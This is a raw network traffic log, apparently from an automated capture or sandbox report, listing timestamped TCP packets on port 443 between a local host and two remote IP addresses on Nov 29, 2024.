                                                                                                                                                                                    Nov 29, 2024 19:49:52.932893991 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:52.934365034 CET49805443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:52.934380054 CET4434980513.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:52.936311007 CET49804443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:52.936330080 CET4434980413.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:52.982673883 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:53.006879091 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:53.007478952 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:53.087831974 CET49806443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:53.087876081 CET4434980613.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:53.091481924 CET49806443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:53.092995882 CET49806443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:53.093013048 CET4434980613.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:53.095129967 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:53.095154047 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:53.097702980 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:53.097709894 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:53.123214960 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:53.126713991 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:53.126847029 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:53.126867056 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:53.141006947 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:53.144296885 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:53.191332102 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:53.473916054 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:53.476586103 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:53.476609945 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:53.542207003 CET443498002.18.84.141192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:53.542288065 CET49800443192.168.2.62.18.84.141
                                                                                                                                                                                    Nov 29, 2024 19:49:53.543545008 CET49800443192.168.2.62.18.84.141
                                                                                                                                                                                    Nov 29, 2024 19:49:53.543555975 CET443498002.18.84.141192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:53.543787003 CET443498002.18.84.141192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:53.544843912 CET49800443192.168.2.62.18.84.141
                                                                                                                                                                                    Nov 29, 2024 19:49:53.580976963 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:53.584350109 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:53.584395885 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:53.584408998 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:53.587337971 CET443498002.18.84.141192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:53.587855101 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:53.587867022 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:53.588172913 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:53.588176966 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:53.588618994 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:53.588623047 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:53.589307070 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:53.589309931 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:53.802337885 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:53.805360079 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:53.805378914 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:53.922343969 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:53.925757885 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:53.925944090 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:53.925956964 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:53.934485912 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:53.934513092 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:53.934595108 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:53.934601068 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:53.935755014 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:53.935765982 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:53.936031103 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:53.936037064 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:54.071290970 CET443498002.18.84.141192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:54.071419001 CET443498002.18.84.141192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:54.071465969 CET49800443192.168.2.62.18.84.141
                                                                                                                                                                                    Nov 29, 2024 19:49:54.072557926 CET49800443192.168.2.62.18.84.141
                                                                                                                                                                                    Nov 29, 2024 19:49:54.072577000 CET443498002.18.84.141192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:54.072587013 CET49800443192.168.2.62.18.84.141
                                                                                                                                                                                    Nov 29, 2024 19:49:54.072593927 CET443498002.18.84.141192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:54.129379988 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:54.132203102 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:54.132229090 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:54.376276016 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:54.379709005 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:54.379770041 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:54.379791975 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:54.381282091 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:54.381289005 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:54.381671906 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:54.381675959 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:54.496284008 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:54.499034882 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:54.499051094 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:54.499129057 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:54.499133110 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:54.580750942 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:54.583220005 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:54.583233118 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:54.718544006 CET4434980513.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:54.718792915 CET49805443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:54.718811989 CET4434980513.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:54.719959974 CET4434980513.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:54.720022917 CET49805443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:54.720959902 CET49805443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:54.721024036 CET4434980513.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:54.721157074 CET49805443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:54.722592115 CET4434980413.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:54.722790003 CET49804443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:54.722798109 CET4434980413.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:54.723819017 CET4434980413.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:54.723877907 CET49804443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:54.724725962 CET49804443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:54.724782944 CET4434980413.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:54.767333984 CET4434980513.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:54.769108057 CET49805443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:54.769129038 CET49804443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:54.769133091 CET4434980513.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:54.769136906 CET4434980413.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:54.816437960 CET49804443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:54.816441059 CET49805443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:54.823043108 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:54.825993061 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:54.826014996 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:54.878433943 CET4434980613.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:54.878492117 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:54.878504992 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:54.878755093 CET49806443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:54.878767014 CET4434980613.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:54.879796028 CET4434980613.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:54.879858971 CET49806443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:54.881011963 CET49806443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:54.881076097 CET4434980613.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:54.881412029 CET49806443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:54.881419897 CET4434980613.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:54.883296013 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:54.923331976 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:54.923377037 CET49806443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:54.944020987 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:54.947012901 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:54.947041035 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:54.947160006 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:54.947164059 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:55.027431965 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:55.030255079 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:55.030281067 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:55.208786011 CET4434980513.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:55.208808899 CET4434980513.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:55.208817005 CET4434980513.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:55.208838940 CET4434980513.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:55.208847046 CET4434980513.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:55.208878994 CET4434980513.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:55.208880901 CET49805443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:55.208899975 CET4434980513.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:55.208913088 CET49805443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:55.208942890 CET49805443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:55.267400980 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:55.273891926 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:55.273912907 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:55.372054100 CET4434980613.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:55.372077942 CET4434980613.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:55.372092009 CET4434980613.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:55.372107029 CET4434980613.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:55.372114897 CET4434980613.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:55.372117043 CET4434980613.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:55.372159004 CET49806443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:55.372170925 CET4434980613.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:55.372219086 CET49806443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:55.372239113 CET49806443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:55.387340069 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:55.390757084 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:55.390990019 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:55.391000986 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:55.391330957 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:55.391335964 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:55.392137051 CET4434980513.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:55.392144918 CET4434980513.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:55.392179966 CET4434980513.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:55.392225981 CET49805443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:55.392236948 CET4434980513.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:55.392276049 CET49805443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:55.395777941 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:55.395782948 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:55.443984032 CET4434980513.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:55.444005966 CET4434980513.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:55.444102049 CET49805443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:55.444113016 CET4434980513.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:55.446436882 CET49805443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:55.513175011 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:55.557940006 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:55.563128948 CET4434980613.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:55.563158035 CET4434980613.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:55.563227892 CET49806443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:55.563240051 CET4434980613.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:55.563260078 CET49806443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:55.563280106 CET49806443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:55.578921080 CET4434980513.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:55.578962088 CET4434980513.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:55.579016924 CET49805443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:55.579052925 CET4434980513.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:55.579066038 CET49805443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:55.579423904 CET49805443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:55.614659071 CET4434980513.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:55.614681005 CET4434980513.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:55.614754915 CET49805443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:55.614764929 CET4434980513.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:55.614808083 CET49805443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:55.619115114 CET4434980613.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:55.619147062 CET4434980613.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:55.619187117 CET49806443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:55.619194984 CET4434980613.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:55.619220018 CET49806443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:55.619240046 CET49806443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:55.634927034 CET4434980513.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:55.634965897 CET4434980513.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:55.634984016 CET49805443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:55.634993076 CET4434980513.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:55.635023117 CET49805443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:55.635032892 CET49805443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:55.651962996 CET4434980613.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:55.652034998 CET49806443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:55.652041912 CET4434980613.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:55.652056932 CET4434980613.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:55.652108908 CET49806443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:55.653414011 CET4434980513.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:55.653434992 CET4434980513.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:55.653502941 CET49805443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:55.653512955 CET4434980513.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:55.653650045 CET49805443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:55.677752018 CET49806443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:55.677766085 CET4434980613.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:55.687341928 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:55.687351942 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:55.689790964 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:55.689795971 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:55.716017962 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:55.719494104 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:55.767328024 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:55.775317907 CET4434980513.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:55.775340080 CET4434980513.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:55.775420904 CET49805443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:55.775437117 CET4434980513.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:55.775465965 CET49805443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:55.775484085 CET49805443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:55.791732073 CET4434980513.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:55.791753054 CET4434980513.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:55.791801929 CET49805443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:55.791810989 CET4434980513.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:55.791851997 CET49805443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:55.806057930 CET4434980513.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:55.806077957 CET4434980513.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:55.806138992 CET49805443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:55.806148052 CET4434980513.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:55.806260109 CET49805443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:55.821942091 CET4434980513.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:55.821960926 CET4434980513.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:55.822014093 CET49805443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:55.822025061 CET4434980513.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:55.822065115 CET49805443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:55.836554050 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:55.836837053 CET4434980513.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:55.836858034 CET4434980513.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:55.836893082 CET49805443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:55.836901903 CET4434980513.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:55.836929083 CET49805443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:55.836940050 CET49805443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:55.842120886 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:55.842143059 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:55.848355055 CET4434980513.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:55.848403931 CET4434980513.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:55.848449945 CET49805443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:55.848452091 CET4434980513.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:55.848504066 CET49805443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:55.848835945 CET49805443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:55.848849058 CET4434980513.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:55.882735968 CET49810443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:55.882781029 CET4434981013.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:55.882867098 CET49810443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:55.883117914 CET49810443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:55.883133888 CET4434981013.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:55.956927061 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:55.959781885 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:55.959801912 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:56.021816015 CET49811443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:56.021845102 CET4434981113.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:56.022073984 CET49811443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:56.022392988 CET49811443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:56.022413969 CET4434981113.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:56.037746906 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:56.041484118 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:56.041496992 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:56.132024050 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:56.174504042 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:56.174526930 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:56.177994967 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:56.178010941 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:56.178088903 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:56.178097963 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:56.333019972 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:56.336139917 CET49769443192.168.2.613.107.246.63
                                                                                                                                                                                    Nov 29, 2024 19:49:56.336162090 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:56.448654890 CET4434976913.107.246.63192.168.2.6
                                                                                                                                                                                    Nov 29, 2024 19:49:56.448709965 CET49769443192.168.2.613.107.246.63
